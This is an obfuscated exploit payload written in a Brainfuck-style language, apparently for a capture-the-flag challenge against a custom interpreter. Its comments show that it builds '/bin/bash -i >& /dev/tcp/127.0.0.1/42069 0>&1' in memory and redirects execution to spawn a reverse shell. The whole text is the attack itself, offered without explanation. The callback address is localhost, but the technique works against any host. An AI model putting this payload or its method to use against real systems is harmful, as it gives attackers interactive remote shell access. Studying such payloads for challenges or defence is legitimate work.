>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
/bin/bash
>++++++++[<++++++>-]<-
>>++++++++++[<++++++++++>-]<--
>>+++++++++++[<++++++++++>-]<-----
>>++++++++++[<+++++++++++>-]<
>>++++++++[<++++++>-]<-
>>++++++++++[<++++++++++>-]<--
>>++++++++++[<++++++++++>-]<---
>>+++++++++++[<++++++++++>-]<+++++
>>++++++++++[<++++++++++>-]<++++
at 72 goto 80
>>>>>>>>
need 4 ptrs
>>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>>
"'dash'i" addr 120
>+++++++++[<+++++>-]<
>>>+++++[<++++>-]<+[<+++++>-]
"'arrow''amp'" 124
>++++++++[<++++++++>-]<--
>>++++++[<++++++>-]<++>
"/dev/tcp/127'dot'0'dot'0'dot'1/42069" addr 132
>>++++[<+++>-]<[<++++>-]<-
>>>+++++[<++++>-]<[<+++++>-]
>>+++++[<++++>-]<[<+++++>-]<+
>>>+++++[<++++>-]<[<++++++>-]<--
>>>++++[<+++>-]<[<++++>-]<-
>>>++++++[<+++++>-]<-[<++++>-]
>>+++++[<+++++>-]<[<++++>-]<-
>>>+++++++[<++++>-]<[<++++>-]
>>++++[<+++>-]<[<++++>-]<-
>>+++++++[<+++++++>-]
>+++++++[<+++++++>-]<+
>>>+++++[<+++++>-]<[<++>-]<+++++
>>>++++[<+++>-]<[<++++>-]<--
>>>++++[<+++>-]<[<++++>-]
>>++++[<+++>-]<[<++++>-]<--
>>>++++[<+++>-]<[<++++>-]
>>++++[<+++>-]<[<++++>-]<--
>>>++++[<+++>-]<[<++++>-]<+
>>>++++[<+++>-]<[<++++>-]<-
>>>++++[<+++>-]<[<++++>-]<++++
>>>++++[<+++>-]<[<++++>-]<++
>>>++++[<+++>-]<[<++++>-]
>>++++[<+++>-]<[<++++>-]<++++++
>>>++++[<+++>-]<[<++++>-]<++++++++++>
0'arrow''amp'1 addr 153
>>>++++[<+++>-]<[<++++>-]
>>++++++++[<++++++++>-]<--
>>++++++[<++++++>-]<++
>>>++++[<+++>-]<[<++++>-]<+
go back to 80 from 161
<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<<
120
>>+++++[<++++>-]<[<++++++>-]<@
>>>>>>>>
124
>>+++++[<++++>-]<[<++++++>-]<++++@
>>>>>>>>
132
>>+++++[<++++>-]<--[<++++++>-]<@
>>>>>>>>
153
>>>+++++[<+++++>-]<[<++>-]<+[<+++>-]<@
go back to 16
<<<<<<<< <<<<<<<< <<<<<<<<
<<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<<<<<<< <<<<
deref 80
>>+++++[<++++>-]<[<++++>-]<@
goto 8
<<<<<<<<
>+++++++[<++++++++++>-]<------@
<<<<<<<<
>++++++[<++++++++++>-]<-
$